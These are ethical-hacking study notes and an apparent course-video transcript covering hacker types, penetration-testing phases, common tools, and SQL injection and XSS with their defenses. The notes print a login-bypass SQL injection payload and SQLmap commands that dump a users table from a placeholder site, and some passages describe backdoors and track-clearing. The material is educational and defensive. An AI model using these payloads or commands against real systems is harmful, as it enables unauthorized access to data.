    • Ethical vs. Malicious Hacking: The key differentiator between ethical (white hat) and malicious (black hat) hacking lies in intent and authorization.
    • Black hat hackers exploit security vulnerabilities for monetary gain, aiming to steal or destroy private data, alter websites, or disrupt networks. They have malicious intent and try to hide their identities.
    • White hat hackers (ethical hackers) perform the same activities but with the consent of the system owner and with the goal of identifying and remedying security flaws. Their intent is to help the organization and improve its security posture.
    • Types of Hackers: Beyond black and white hats, there are also grey hat hackers who operate in a more ambiguous space, potentially snooping without consent but informing owners of vulnerabilities. Script kiddies use existing tools without deep technical understanding. Nation-sponsored hackers conduct cyber activities on behalf of governments, and hacktivists use hacking to promote political agendas. Ethical hacking primarily falls under the domain of white hat activities.
    • Roles and Responsibilities of an Ethical Hacker: Ethical hackers have several responsibilities, including:
    • Conducting security assessments to identify an organization’s security posture by evaluating existing security controls.
    • Identifying and testing vulnerabilities in systems, networks, and applications.
    • Developing tools and scripts to enhance security or to test for vulnerabilities.
    • Performing risk assessments to determine the potential impact of identified vulnerabilities.
    • Developing and recommending security policies.
    • Providing guidance on mitigating or resolving identified weaknesses.
    • Potentially training staff on network security best practices.
    • Documenting findings and compiling detailed reports on vulnerabilities and recommendations.
    • The Ethical Hacking Process: The typical ethical hacking process involves several phases:
    • Reconnaissance (Information Gathering): Collecting as much information as possible about the target system or organization, including network infrastructure, operating systems, and potential weak points. Tools like Nmap and Netdiscover can be used in this phase.
    • Scanning: Identifying open ports, services, and potential vulnerabilities using tools like Nmap and vulnerability scanners like Nessus.
    • Gaining Access (Exploitation): Attempting to exploit identified vulnerabilities to gain unauthorized access to the system or network, often using tools like Metasploit.
    • Maintaining Access: Establishing mechanisms to retain access to the compromised system for further analysis, which might involve installing backdoors or Trojans.
    • Clearing Tracks: Removing any evidence of the hacking activity to avoid detection.
    • Reporting: Documenting all findings, the vulnerabilities discovered, the exploitation process, and providing recommendations for remediation.
    • Essential Skills and Knowledge: A successful ethical hacker requires a diverse set of skills:
    • Strong knowledge of computer networks and protocols (TCP/IP, HTTP, etc.).
    • Proficiency in operating systems such as Windows, Linux, and macOS, including their server versions.
    • Understanding of programming and scripting languages like Python, Java, C++, PHP, Ruby, HTML, and JavaScript for developing scripts, automating tasks, and understanding web applications.
    • Knowledge of web applications and databases, including common vulnerabilities like SQL injection and cross-site scripting (XSS).
    • Familiarity with security technologies like firewalls, intrusion detection/prevention systems (IDS/IPS), antivirus software, and endpoint security.
    • Understanding of cryptography, including encryption and decryption techniques.
    • Awareness of common attack vectors and techniques, including malware, social engineering, and network attacks.
    • Strong problem-solving and analytical thinking skills.
    • Awareness of cyber security laws and ethics.
    • Ethical Hacking Tools: Ethical hackers utilize a wide range of tools for various tasks:
    • Network Scanners: Nmap is a key tool for network discovery and port scanning.
    • Vulnerability Scanners: Nessus and Acunetix are used to identify potential vulnerabilities in systems and web applications.
    • Penetration Testing Frameworks: Metasploit is a powerful framework with a vast collection of exploits for testing vulnerabilities.
    • Packet Analyzers: Wireshark is used to capture and analyze network traffic.
    • Password Cracking Tools: John the Ripper is used for dictionary attacks and brute-force password cracking.
    • Web Application Testing Tools: Burp Suite is a popular tool for testing web application security.
    • SQL Injection Tools: SQLmap automates the process of detecting and exploiting SQL injection vulnerabilities.
    • Kali Linux is a popular Linux distribution specifically designed for penetration testing, containing hundreds of pre-installed ethical hacking tools.
    • Social Engineering: This is a non-technical hacking technique that involves manipulating humans into revealing confidential information or performing actions that compromise security. Common social engineering tactics include phishing, pretexting, and exploiting human curiosity or greed.
    • Importance and Benefits for Organizations: Ethical hacking is crucial for organizations to proactively identify and address security weaknesses before malicious actors can exploit them. This helps in preventing data breaches, minimizing financial losses, and protecting reputation. Regular security audits conducted by ethical hackers help organizations stay ahead of cyber threats and ensure the integrity of their digital infrastructure.
    • Certifications: Obtaining certifications like Certified Ethical Hacker (CEH), Offensive Security Certified Professional (OSCP), and CompTIA Security+ can validate an ethical hacker’s skills and enhance their credibility.
    • Job Roles: The field of ethical hacking offers various job roles, including Ethical Hacker, Penetration Tester, Network Security Engineer, Cyber Security Analyst, Information Security Manager, Security Consultant, and Cyber Security Engineer.
    • Ethical Hacking and Penetration Testing: While often used interchangeably, penetration testing is a specific subset of ethical hacking that focuses on actively attempting to penetrate information systems using various attack methods. Ethical hacking is a broader field that encompasses not only penetration testing but also vulnerability assessments, policy development, and other proactive security measures.

    By understanding these concepts, individuals and organizations can better appreciate the role and importance of ethical hacking in the ongoing battle against cyber threats.

    Security Testing Tools for Ethical Hacking

    Security testing tools are essential for ethical hackers and security professionals to identify, analyze, and exploit vulnerabilities in computer systems, networks, and applications. These tools enable a proactive approach to security, allowing organizations to strengthen their defenses before malicious actors can cause harm.

    Here is a discussion of various security testing tools mentioned in the sources:

    1. Vulnerability Scanners:

    • Nessus: This is an automated vulnerability scanner designed to identify security weaknesses within hosts, operating systems, and networks. It uses a built-in database of known vulnerabilities and scans the target environment to find potential flaws. Ethical hackers use Nessus to discover a list of potential vulnerabilities that can then be further investigated.
    • Acunetix and Arachni (transcribed as “Arachnne” in the source): These are examples of application scanners that focus on identifying flaws specifically within web applications. They help security testers understand potential weaknesses like SQL injection or cross-site scripting.
    • OpenVAS (Greenbone Vulnerability Manager): This tool provides a comprehensive vulnerability management system, performing scans to detect vulnerabilities across the target.
    • Netsparker: This is another automated web application security scanner that is configurable and helps secure web applications by identifying reported vulnerabilities.

    2. Penetration Testing Frameworks and Tools:

    • Metasploit: This is a powerful penetration testing framework widely used by both ethical hackers and malicious actors. It contains a vast collection of readymade and custom exploits that can be used to probe for and exploit systemic vulnerabilities in networks and servers. Ethical hackers use Metasploit to validate vulnerabilities identified by scanners and to simulate real-world attacks by crafting or choosing appropriate exploits. It can be used to gain access, and depending on the vulnerability, even run root commands.
    • Burp Suite Professional: This is a popular proxy-based tool used for penetration testing and finding vulnerabilities in web applications. It allows for the evaluation of web application security through hands-on testing.

    3. Network Analysis Tools:

    • Nmap (Network Mapper): This is a free and open-source utility for network discovery and security auditing. It can identify live hosts on a network, the services they are running, their operating systems, and the types of packet filters and firewalls in use. Ethical hackers use Nmap in the early reconnaissance phase to understand the target’s network infrastructure and identify potential entry points through open ports and services.
    • Wireshark: This is a free and open-source packet analyzer used for network troubleshooting, analysis, and security auditing. It captures network traffic at a microscopic level, allowing for detailed analysis of data packets. Ethical hackers use Wireshark to monitor network traffic during vulnerability scans and exploitation attempts, helping them understand the communication flow and analyze the success of their attacks (a command-line capture sketch follows this list).
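
    For readers who prefer the terminal, Wireshark ships with a command-line companion, tshark, and a capture like the sketch below parallels the monitoring use case described above. The interface name and filters are placeholder choices.

    ```bash
    # Capture 100 packets of web traffic on eth0 and save them for later analysis
    sudo tshark -i eth0 -f "tcp port 80" -c 100 -w web.pcap
    # Offline analysis: list the source IP and requested host for each HTTP request
    tshark -r web.pcap -Y http.request -T fields -e ip.src -e http.host
    ```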

    4. Specific Attack Tools:

    • SQLmap: This is an automated tool specifically designed for detecting and exploiting SQL injection vulnerabilities in web applications. It can automatically craft and execute SQL injection queries to test for flaws and potentially retrieve data from databases (a usage sketch follows this list).
    • John the Ripper: This is an open-source password security auditing and password recovery tool. It supports various password cracking techniques, including dictionary attacks and brute-force attacks, to test the strength of passwords.
    • Airgeddon (transcribed as “Air Garden” in the source): This is a multi-use bash script for Linux systems used for hacking and auditing wireless networks. It can be used to launch denial-of-service attacks on Wi-Fi networks and supports various Wi-Fi hacking methods like WPS attacks and handshake captures.
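
    A typical SQLmap session against a deliberately vulnerable lab application might look like the sketch below; the URL and database names are placeholders, and such scans belong only in authorized test environments.

    ```bash
    # Probe a URL parameter for SQL injection and enumerate databases
    sqlmap -u "http://testsite.local/item.php?id=1" --batch --dbs
    # List tables in a discovered database, then dump a table of interest
    sqlmap -u "http://testsite.local/item.php?id=1" --batch -D appdb --tables
    sqlmap -u "http://testsite.local/item.php?id=1" --batch -D appdb -T users --dump
    ```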

    5. Operating Systems for Security Testing:

    • Kali Linux: This is a Debian-based Linux distribution specifically designed for penetration testing and security auditing. It comes with hundreds of pre-installed tools targeted towards various information security tasks, including vulnerability assessment, penetration testing, computer forensics, and reverse engineering. Its features, pre-installed tools, and customizability make it a popular choice for ethical hackers.

    The Role of Security Testing Tools in Ethical Hacking:

    Ethical hackers utilize these tools throughout the different phases of penetration testing:

    • Reconnaissance: Tools like Nmap are used to gather information about the target network and systems.
    • Scanning: Nmap is further used for port scanning, and vulnerability scanners like Nessus and Acunetix are employed to identify potential weaknesses.
    • Gaining Access: Metasploit is a key tool in this phase, used to exploit identified vulnerabilities. Tools like SQLmap and password cracking tools like John the Ripper might also be used depending on the identified flaws.
    • Maintaining Access: While not explicitly a “tool,” understanding operating system functionalities for installing backdoors (as mentioned in the context of malicious hackers) is relevant, although ethical hackers focus on reporting such potential avenues rather than maintaining unauthorized access long-term in a real audit.
    • Reporting: While there isn’t a specific tool listed for reporting, the output and findings from all the above tools are crucial for generating a comprehensive security assessment report.

    It’s important to note that the essence of ethical hacking goes beyond simply running automated tools. Ethical hackers need to understand the reports generated by these tools, analyze the findings, and potentially craft their own exploits or use existing ones in a specific manner to bypass security controls. They also need to be aware of security laws and standards to ensure their testing activities are legal and ethical.

    Network Security Core Principles and Key Tools

    Based on the sources, several key principles underpin network security. Network security is a set of technologies and processes aimed at protecting the usability, integrity, and confidentiality of a company’s network infrastructure and the data transmitted and stored within it. It involves preventing unauthorized access, misuse, modification, or destruction of the network and its resources.

    Here are some core network security principles derived from the sources:

    • Confidentiality: Ensuring that sensitive information is protected from unauthorized disclosure. Cryptography, such as encryption of data in transit (mentioned in the sources in the context of HTTPS and of VPNs using IPSec), plays a vital role in maintaining confidentiality.
    • Integrity: Maintaining the accuracy and completeness of data, preventing unauthorized modification. Authentication Header (AH) within IPSec is responsible for data integrity.
    • Availability: Ensuring that authorized users have reliable access to network resources and data when needed. Protecting against denial-of-service (DoS) attacks (mentioned in the sources in the context of botnets and cyber warfare) is crucial for maintaining availability.
    • Authentication: Verifying the identity of users, devices, or applications trying to access the network. This ensures that only legitimate entities are granted entry.
    • Authorization: Defining and enforcing the level of access granted to authenticated users. This principle ensures that users only have access to the resources necessary for their roles.
    • Layering of Security (Defense in Depth): Implementing multiple security controls at different levels of the network to provide comprehensive protection. If one layer fails, others are in place to offer continued security. The sources discuss physical, technical, and administrative security layers.
    • Physical Security: Protecting physical access to network components like servers and routers.
    • Technical Security: Utilizing hardware and software-based controls such as firewalls, intrusion prevention systems (IPS), and encryption.
    • Administrative Security: Implementing policies, procedures, and user training to govern security-related behavior. Password policies and training staff for network security are examples of administrative controls.
    • Proactive Security: Identifying and mitigating vulnerabilities before they can be exploited by malicious actors. Ethical hacking and penetration testing are proactive approaches to security, where vulnerabilities are intentionally sought out and addressed.
    • Continuous Monitoring and Analysis: Regularly monitoring network traffic and security events to detect and respond to threats. Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) are tools used for this purpose. Wireshark is a tool that allows for real-time and offline network traffic analysis. Behavioral analytics can also help detect anomalies in network traffic that might indicate an attack.
    • Policy Enforcement: Establishing and consistently enforcing security policies to guide user behavior and system configurations. Ethical hackers may analyze and enhance an organization’s security policies.
    • Risk Assessment: Identifying potential threats and vulnerabilities and evaluating the potential impact they could have on the organization. Ethical hackers often perform risk assessments to prioritize vulnerabilities based on their criticality.
    • Security Awareness and Training: Educating users about security threats and best practices to minimize the risk of human error being exploited. Training staff on what is allowed and not allowed helps secure the organization.

    Key tools that support these principles include:

    • Firewalls: Act as a barrier between trusted and untrusted networks, controlling incoming and outgoing traffic based on defined rules. They can be hardware or software-based.
    • Intrusion Prevention Systems (IPS): Continuously scan networks for malicious activity and take action to block or prevent it.
    • Virtual Private Networks (VPNs): Create encrypted connections over public networks, ensuring secure transmission of sensitive data. VPNs often utilize IPSec protocols.
    • Network Scanners (e.g., Nmap): Used for network discovery, identifying open ports and services, and potential vulnerabilities.
    • Vulnerability Scanners (e.g., Nessus, Acunetix): Automatically identify known security weaknesses in systems and applications.
    • Packet Analyzers (e.g., Wireshark): Capture and analyze network traffic for troubleshooting, security analysis, and understanding communication protocols.

    By adhering to these network security principles and utilizing appropriate tools, organizations can significantly reduce their risk of falling victim to cyber threats and maintain a secure network environment.

    Web Application Vulnerabilities: SQL Injection and XSS

    Based on the sources, web applications are a significant target for security vulnerabilities because they are often accessible over the internet or internal networks and handle sensitive data. The sources highlight several key web application vulnerabilities, their exploitation, and preventative measures.

    1. SQL Injection:

    • Definition: SQL injection is a code injection technique that might exploit security vulnerabilities occurring in the database layer of an application. These vulnerabilities are present when user input is improperly filtered and is inserted into SQL statements. This allows attackers to send malicious SQL code that can be executed by the backend database.
    • Exploitation: Attackers can craft malformed SQL queries by injecting special characters (like single quotes) and SQL operators into input fields such as login forms or URL parameters. By doing so, they can bypass authentication mechanisms, retrieve sensitive data, modify database content, or even execute arbitrary commands on the database server. The demo in the source shows how injecting ' or 1=1 -- - into a username field can bypass authentication. Attackers may also try to induce errors to understand the database structure and version, which helps in crafting more effective attacks. Tools like SQLmap are designed to automate the process of detecting and exploiting SQL injection vulnerabilities.
    • Types of SQL Injection: The source mentions different types of SQL injection:
    • In-band SQL Injection: The attacker can receive the results of their attack directly through the same communication channel used to inject the code. This includes:
    • Error-based Injection: Exploiting database error messages to gain information about the database structure.
    • Union-based Injection: Using the UNION SQL keyword to combine the results of multiple queries into a single response.
    • Blind SQL Injection: The attacker cannot see the results of their injected queries directly but can infer information based on the application’s response (e.g., different responses for true or false conditions, or time delays). This includes:
    • Boolean-based: Observing different application responses based on true or false conditions in the injected query.
    • Time-based: Injecting queries that cause a time delay in the database response to confirm successful execution.
    • Out-of-band SQL Injection: Less common, this involves the attacker relying on different channels (e.g., email, DNS requests) to receive data from the database server.
    • Prevention: The source outlines several best practices to prevent SQL injection attacks:
    • Use Prepared Statements and Parameterized Queries: These ensure that user-supplied data is treated as data and not as executable code.
    • Object Relational Mapping (ORM): ORM frameworks can help abstract database interactions and reduce the risk of direct SQL injection.
    • Escaping Inputs: Properly sanitizing user input by escaping special characters that have meaning in SQL can prevent them from being interpreted as code. However, the source cautions that not all injection attacks rely on specific characters, and not all languages have equally effective escaping functions.
    • Password Hashing: While not directly preventing SQL injection, properly hashing passwords prevents attackers from easily obtaining plaintext credentials if a database breach occurs.
    • Third-Party Authentication: Utilizing secure third-party authentication mechanisms can reduce the application’s responsibility for handling sensitive credentials.
    • Web Application Firewalls (WAFs): WAFs can be configured to identify and block malicious SQL queries before they reach the application.
    • Secure Coding Practices and Software Updates: Using secure coding practices and keeping software and libraries up to date helps patch known vulnerabilities.
    • Principle of Least Privilege: Database user accounts used by the application should have the minimum necessary privileges.

    2. Cross-Site Scripting (XSS):

    • Definition: Cross-Site Scripting (XSS) attacks involve injecting malicious scripts (most commonly JavaScript) into websites viewed by other users. This happens when a web application does not properly sanitize user input before displaying it to other users.
    • Exploitation: Attackers can inject malicious scripts through various entry points, including:
    • Input fields (e.g., search bars, comment sections, forms)
    • URL parameters
    • Even malicious advertisements
    • Fake emails containing malicious links
    The injected script then executes in the victim’s browser when they view the compromised page. This can allow the attacker to:
    • Steal session cookies, allowing them to impersonate the victim and gain unauthorized access to their accounts.
    • Capture keystrokes and other sensitive information.
    • Redirect the user to malicious websites.
    • Run other web browser-based exploits.
    • Display fake login forms to steal credentials.
    The demos in the source illustrate different types of XSS attacks and how they can be executed by injecting JavaScript code into vulnerable web application components.
    • Types of XSS Attacks: The source describes three main types of XSS attacks:
    • Reflected XSS: The malicious script is not permanently stored on the web server. Instead, it is reflected back to the user’s browser as part of the server’s response, often through malicious links or submitted forms. The attack is only effective if the user clicks the malicious link or submits the crafted form.
    • Stored XSS: The malicious script is permanently stored on the target server (e.g., in a database, message board, or comment section). The script is then executed every time a user views the page containing the malicious content, potentially affecting many users. This type is considered riskier due to its persistent nature.
    • DOM-based XSS: The vulnerability exists in the client-side JavaScript code rather than in the server-side code. The attack manipulates the Document Object Model (DOM) in the victim’s browser, causing the client-side script to execute unexpectedly. The malicious payload might be in the URL fragment (after the #) or other client-side data sources.
    • Prevention: The source provides several methods to prevent XSS attacks:
    • Input Validation and Sanitization: Always screen and validate any user input before including it in HTML output or using it in client-side scripts. Sanitize user input by removing or encoding potentially harmful characters. Validation should occur on both the client-side and server-side.
    • Avoid Displaying Untrusted User Input: If possible, avoid displaying any untrusted user input directly on web pages.
    • Proper Output Encoding/Escaping: When user input must be displayed, properly encode or escape the data based on the context in which it will be rendered (e.g., HTML encoding, JavaScript encoding, URL encoding). Different contexts require different encoding rules, and sometimes multiple layers of encoding are necessary.
    • Content Security Policy (CSP): CSP is an HTTP header that allows website owners to control the sources of content (e.g., scripts, styles, images) that the browser is allowed to load for their website. This can significantly reduce the risk of XSS attacks by preventing the browser from executing malicious scripts from untrusted sources.
    • HttpOnly Cookie Flag: Setting the HttpOnly flag on cookies prevents client-side scripts (like JavaScript) from accessing them. This can mitigate the impact of XSS attacks that aim to steal session cookies. However, the source notes that this relies on browser support. (A quick header check for both of these defenses is sketched after this list.)
    • Automated Security Testing: Use automated testing tools to scan web applications for XSS vulnerabilities before release.
    • Regular Security Audits and Updates: Regularly audit code for vulnerabilities and keep all software and libraries updated to patch known security flaws.
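
    As a quick way to verify two of the defenses above from the command line, the sketch below checks a site’s response headers for a Content Security Policy and for the HttpOnly flag on cookies; the URL is a placeholder.

    ```bash
    # Fetch only the response headers and look for CSP and cookie flags
    curl -sI https://example.com | grep -iE 'content-security-policy|set-cookie'
    # A hardened response would include lines like:
    #   Content-Security-Policy: default-src 'self'
    #   Set-Cookie: session=...; Secure; HttpOnly
    ```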

    Relationship to Security Testing Tools and Principles:

    • Security testing tools like Burp Suite Professional and automated vulnerability scanners like Netsparker and Acunetix (mentioned in our previous conversation) are specifically designed to help identify web application vulnerabilities like SQL injection and XSS. Ethical hackers use these tools to probe web applications, identify potential weaknesses in input handling and output rendering, and verify the effectiveness of security controls.
    • The principle of proactive security is directly addressed by identifying and mitigating web application vulnerabilities through testing and secure coding practices.
    • Input validation and sanitization and proper output encoding are crucial aspects of secure coding, aligning with the network security principle of defense in depth by implementing security at the application level.
    • Continuous monitoring can also involve analyzing web application logs for suspicious activity that might indicate an attempted or successful exploitation of a vulnerability.

    Understanding and addressing web application vulnerabilities like SQL injection and XSS is crucial for maintaining the confidentiality, integrity, and availability of web-based services and the data they handle, which are core principles of network security. The OWASP Broken Web Applications project, as mentioned in the source, provides a legal and safe environment to practice identifying and exploiting these vulnerabilities to enhance security skills.

    Ethical Hacking Full Course 2025 | Ethical Hacking Course for Beginners | Simplilearn

    hello everyone and welcome to ethical hacking full course by simply learn in today’s digital world cyber threats are everywhere making cyber security more important than ever this course will teach you the same tools and techniques ethical hackers use to protect networks application and data from cyber attacks with cyber threats increasing the demand for ethical hackers is expected to grow even more by 2025 companies across industries need skilled professionals to secure their systems offering starting salaries around $70,000 in the US and around 6 to 10 LPA in India while experienced hackers can earn over $120,000 plus or 25 lakhs perom in India so in this course you’ll get hands-on experience with ethical hacking learn how to spot vulnerabilities and strengthen security systems so whether you’re new to cyber security or looking to sharpen your skills this course is your pathway to a high demand and well-paying career in ethical hacking but before we commence if you’re interested in stepping one of the most in demand fields in 2025 the advanced executive program in cyber security by simply learn is your perfect opportunity in just 6 months you’ll gain expertise in ethical hacking penetration testing ransomware analysis and advanced defense strategies through a hands-on industry relevant approach this program is offered in collaboration with Triple IT Bangalore and IBM features live interactive classes real world projects and industry recognized certifications so hurry up and enroll now find the course link description box below and in the pin comments data is the new gold imagine how much data is generated by just your smartphone every single day be it the pictures you click or the messages you send nearly 41 million messages are sent worldwide via WhatsApp every single minute so safeguarding your personal data against hackers has now become a top priority did you know that India leads the world when it comes to ethical hackers with 23% of the worldwide hacking population from India the top ethical hackers earn more than twice of what software engineers in India do but what makes ethical hacking such a demanding industry ethical hacking is the process of taking security measures to safeguard data and networks from malicious cyber attacks the hackers use every tool at their disposal to try and breach the security barrier and find any potential vulnerabilities the ethical ineth ethical hacking denotes the lack of malicious intent since these sessions are often permitted by the system owner or the network that is being hacked into to fix any compromised entry points before blackhead hackers discover and exploit them so what is a blackhead hacker you may ask a hacker who exploits security vulnerabilities for monetary gains like stealing or destroying private data altering disrupting or shutting down websites and networks is known as a blackhead hacker on the other end of the spectrum we have whitehead hackers who help people secure the networks by stress testing their platform against the most dangerous of cyber attacks that is with their consent of course but the most neutral of the bunch are greyhead hackers who may not ask for consent before snooping on a foreign system but they do inform the owner if they find any vulnerabilities sometimes in exchange for a small fee the security breaches have become less and less prevalent thanks to rigorous ethical hacking campaigns and corporate awareness programs the ability to fix critical security issues before black hat hackers leverage them 
has saved organizations billions of dollars google IBM Microsoft and virtually every major corporation are looking to protect the data so it shouldn’t come as a surprise that the ethical hacking and information security job market is set to rise by nearly 28% by 2026 with salaries going as high as $225,000 perom so that’s ethical hacking wrapped up in 2 minutes to catch more byite-size and detailed videos on different technologies subscribe to Simple Learn and stay updated scammers targeting institutions such as hospitals schools and government offices for ransom pocketed $1.1 billion last year compared with 567 million in 2022 cyber security experts act as a multi-level line of defense against cyber attacks through all internet activity securing individuals corporate giants tech multinational companies international agencies and even governments hence this extremely critical role demands a great pay and the demand for it continues to grow year after year with beginner level salaries averaging around $75,000 with years of experience it can go to above $200,000 for chief information officer level roles due to the extremely critical nature of this job role there is a demand across all verticals including defense healthcare banking tech and even education sector if you want to become a cyber security engineer in 2024 here is how you can jumpstart your career in this field we will split the entire learning path in three major sections beginning with core concepts level topics then we will move on to intermediate skill-based topics and eventually we will discuss what topics to learn in niche cyber security skills let us start with core concept level topics start with getting a thorough introduction to cyber security make sure to learn the basics of cyber security including all the important terminology types of threats how these threats work and what are the working principles in cyber security from there you can move on to mastering networking fundamentals this is an absolute must know to enter the field of cyber security you need to be thorough with how the internet works how the data highway functions right from the function of operating systems to understanding of TCPIP OC model routing and switching every single one of these concepts are critically important make sure to keep these skills handy at all times since they help in understanding the overarching concepts easily but it’s not just the networking part of operating systems that you need to know this is where the next important part comes into the picture operating systems proficiency in Windows Linux and possibly Macos operating systems allows you to work across all domains being adept in each of these helps you become better at safeguarding the fault lines across them this is critical for your day-to-day working since you will be directly iterating with these to perform your daily tasks it is not unknown that mathematics and computer science go hand in hand this extends to the field of cyber security too you need to learn cryptography where the knowledge of encryption decryption cryptographic algorithms and protocols is very important next up is risk management understanding risk assessment mitigation strategies and compliance frameworks like GDPR and HIPPA finally you should also understand cyber security laws and ethics awareness of legal and ethical considerations in cyber security let us now move on to two intermediate level skill and toolsbased topics security technologies familiarity with firewalls intrusion detection 
and prevention systems, antivirus software and endpoint security; vulnerability assessment and penetration testing, meaning hands-on experience with tools like Nessus, Metasploit, Nmap and Burp Suite; security operations, covering incident response, threat hunting, log analysis, and security information and event management; secure coding practices, meaning knowledge of secure software development practices and common vulnerabilities like the OWASP Top 10; cloud security, an understanding of cloud computing security principles and best practices, including AWS, Azure and Google Cloud Platform; and mobile security, knowledge of mobile application security testing and best practices for securing mobile devices. Now that you have mastered core concepts and intermediate skills and tools, based on your interest you can move on and choose one of the niche fields for learning niche cyber security skills: industrial control systems security, an understanding of SCADA systems, PLCs and protocols like Modbus and DNP3; IoT security, knowledge of securing Internet of Things devices and protocols; blockchain security, an understanding of blockchain technology and its security implications; threat intelligence, gathering, analyzing and leveraging threat intelligence to enhance a cyber security posture; reverse engineering, skill in analyzing malware and understanding its behavior; and red team/blue team exercises, participating in simulated attacks (red team) and defending against them (blue team). With that said, we have reached the end of our video. This learning path covers a broad range of topics and skills necessary for a cyber security engineer in 2024, starting from foundational concepts to specialized areas within the field. Make sure to stay updated and keep aligning this learning path to your requirements. If you have any questions about this learning path, or about cyber security in general, that need to be answered, let us know in the comment section below and we would be happy to help.

Let's understand the types of hackers. So what are the types of hackers? A hacker is a technically skilled person who is very adept with computers: they have good programming skills, they understand how operating systems work, they understand how networks work, they understand how to identify flaws and vulnerabilities within all of these aspects, and then they understand and know how to misuse these flaws to get an outcome which would be detrimental to the health of the organization. There are six types of hackers that have been identified: black hat hackers, white hat hackers, grey hat hackers, script kiddies, nation-sponsored hackers and hacktivists. Black hat hackers are basically the malicious hackers who have malicious intent and criminalistic tendencies; they want to harm the organization by hacking into their infrastructure, by destroying their infrastructure, by destroying their data, so that they can gain from it from a monetary perspective. These people are also known as crackers. The main traits of these people are that they have malicious intent, they carry out unauthorized activities, and they do it for personal gain. Another important aspect to remember is that a black hat hacker will always try to hide their identity: they will spoof their online digital identity by masking it, by spoofing their IP addresses and MAC addresses, and try to remain anonymous on the network. A white hat hacker, on the other hand, also called an ethical hacker or a security analyst, is an individual who will do exactly the same thing that a black hat hacker would do, minus the malicious
intent, plus the intent of helping the organization by identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities. They are authorized to act on the company's behalf; they are authorized to carry out the activity which helps the company identify those flaws and thus mitigate them, improving its security posture. So these kinds of security experts, or ethical hackers, help organizations defend themselves against unauthorized attacks. A grey hat hacker is a blend of both white hat and black hat: they can work both defensively and offensively. They can accept contracts from organizations to increase their security posture; at the same time, they can also get involved in malicious activities towards other organizations, to personally gain or benefit by doing unauthorized activity. Script kiddies are people who are technically not very aware of what hacking is. They rely on existing tools that have been created by other hackers; they have no technical knowledge of what they're doing, and it's just hit or miss for them. They get their hands on a tool and try to execute it; if the hack works, it works, otherwise it doesn't. These people are basically noobs, or newbies, who are trying to learn hacking, or people with malicious intent who just want to have some fun or impress the people around them. Then we have the nation- or state-sponsored hackers. As the name suggests, these hackers are sponsored by their government. This may not be a legitimate job, but most governments do have hackers on their payroll to spy on their enemies, to spy on various countries and try to figure out the aspirations of those countries. This is basically a spying activity, where you are technically trying to get access to another country's resources and then spy on them to figure out what their activities have been or what their future plans are. And then we have the hacktivists. A hacktivist is an individual who has a political agenda to promote, and they promote it through hacking. So what is the difference between a black hat hacker and a hacktivist? The black hat hacker will try to hide their identity; the hacktivist will claim responsibility for what they have done, because for them it's a political agenda, a political cause, and they will hack various organizations to promote that cause. They would typically do this by defacing websites and posting the messages they want to promote on those websites. So what exactly is ethical hacking, then? We have discussed the types of hackers; we have identified a malicious hacker as a black hat hacker, with the intent of doing harm to an organization's network for personal gain; and we have discussed what an ethical hacker is. An ethical hacker would be doing the same activity, but in an authorized manner. They would have legal contracts signed with the organization, giving them a definite scope of what they are allowed and not allowed to do, and the ethical hackers would function within that scope. They would execute test scenarios designed to identify flaws or system vulnerabilities, and then submit a report to the management on what they have found. They would also help the management mitigate or resolve those weaknesses, so that nobody else can misuse them later on. They
might use the same techniques and the same tools that black hat hackers do; however, the main difference here is that these people are authorized to do that particular activity, and they do it in a controlled manner, with the intent of helping the organization and not with the intent of personal gain. So who is an ethical hacker? Again, an ethical hacker is a highly intelligent, highly educated person who knows how computers function, how programming languages work, and how operating systems work. They can troubleshoot; they are technically very adept at computing; they understand the architecture and how the various components in a computer work; and they are basically very good with programming as well. Now, when I say programming, we don't need the ethical hacker to be a great developer of applications; we want them to understand programming in such a way that they can create scripts and write their own short programs, like viruses, worms, trojans or exploits, which will help them achieve the objective they have set out for. So, as you can see, ethical hackers are individuals who perform a security assessment of their companies with the permission of the concerned authorities. What is a security assessment? A security assessment is finding out the exact security posture of the organization by identifying what security controls are in place, how they have been configured, and whether there are any gaps in the configurations themselves. So an organization will hire an ethical hacker; they would give the ethical hacker information about what security controls, what firewalls, what IDS/IPS (intrusion detection or intrusion prevention systems) and antiviruses are already in place; and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization. What is the need for an ethical hacker? The need for an ethical hacker is proactive security. The ethical hacker identifies all the existing flaws in an organization and tries to resolve them, to help secure the organization against black hat hackers. So ethical hackers prevent hackers from cracking into an organization's network by securing the organization and improving its security on a periodic basis; they also try to identify system vulnerabilities, network vulnerabilities or application-level vulnerabilities that have been missed, and then figure out a way of plugging or resolving them so that they cannot be misused by other hackers. They would also analyze and enhance an organization's security policies. Now, what are policies? Policies are basically documents created by an organization, containing rules that all employees need to follow to ensure that the security of the organization is maintained. For example, a password policy. A password policy helps users in an organization adhere to the standards the organization has identified for password complexity: for example, when a user creates a password, it should adhere to standards where random words are used; the password contains the alphabet a through z in uppercase and lowercase, the numerics 0 through 9, and special characters; and it is randomized, so that the password becomes stronger and resists brute force attacks.
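To make that kind of policy concrete in the document's own language, here is a minimal Bash sketch of a complexity check; the specific policy values (minimum length 12, one of each character class) are illustrative assumptions, not an official standard.

```bash
#!/bin/bash
# check_password.sh - minimal sketch of a password complexity check.
# The policy values (length >= 12, one of each character class) are
# illustrative assumptions. Real systems enforce this via PAM rules;
# also note that passing secrets as CLI arguments is itself unsafe.

password="$1"
errors=0

[ "${#password}" -ge 12 ]         || { echo "too short (min 12)"; errors=1; }
[[ "$password" =~ [a-z] ]]        || { echo "needs a lowercase letter"; errors=1; }
[[ "$password" =~ [A-Z] ]]        || { echo "needs an uppercase letter"; errors=1; }
[[ "$password" =~ [0-9] ]]        || { echo "needs a digit"; errors=1; }
[[ "$password" =~ [^a-zA-Z0-9] ]] || { echo "needs a special character"; errors=1; }

if [ "$errors" -eq 0 ]; then
    echo "password meets the policy"
else
    exit 1
fi
```

Running `./check_password.sh 'Tr0ub4dor&33'` would print "password meets the policy", while a short all-lowercase string fails with a reason per unmet rule.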
